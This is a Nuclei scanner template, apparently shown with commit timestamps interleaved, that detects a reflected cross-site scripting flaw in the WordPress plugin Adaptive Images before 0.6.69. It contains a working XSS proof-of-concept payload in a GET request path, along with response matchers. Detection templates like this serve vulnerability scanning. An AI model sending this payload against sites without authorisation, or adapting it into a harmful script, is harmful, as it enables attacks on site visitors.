2022-02-27 15:50:50 +00:00
id : wp-adaptive-xss
info :
name : Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting
author : dhiyaneshDK
severity : medium
description : The plugin does not sanitise and escape the REQUEST_URI before outputting it back in a page, leading to a Reflected Cross-Site Scripting issue
2022-02-28 21:00:16 +00:00
reference :
- https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0
- https://plugins.trac.wordpress.org/changeset/2655683
tags : wordpress,xss,wp-plugin,wp
2022-02-27 15:50:50 +00:00
requests :
2022-02-28 21:00:16 +00:00
- method : GET
path :
- "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true"
2022-02-27 15:50:50 +00:00
2022-02-27 16:06:08 +00:00
matchers-condition : and
matchers :
- type : word
words :
2022-02-28 21:00:16 +00:00
- '<img/src/onerror=alert(document.domain)>'
- '<td>Image</td>'
condition : and
2022-02-27 15:50:50 +00:00
2022-02-27 16:06:08 +00:00
- type : word
part : header
words :
- 'text/html'
- type : status
status :
2022-02-28 21:00:16 +00:00
- 200
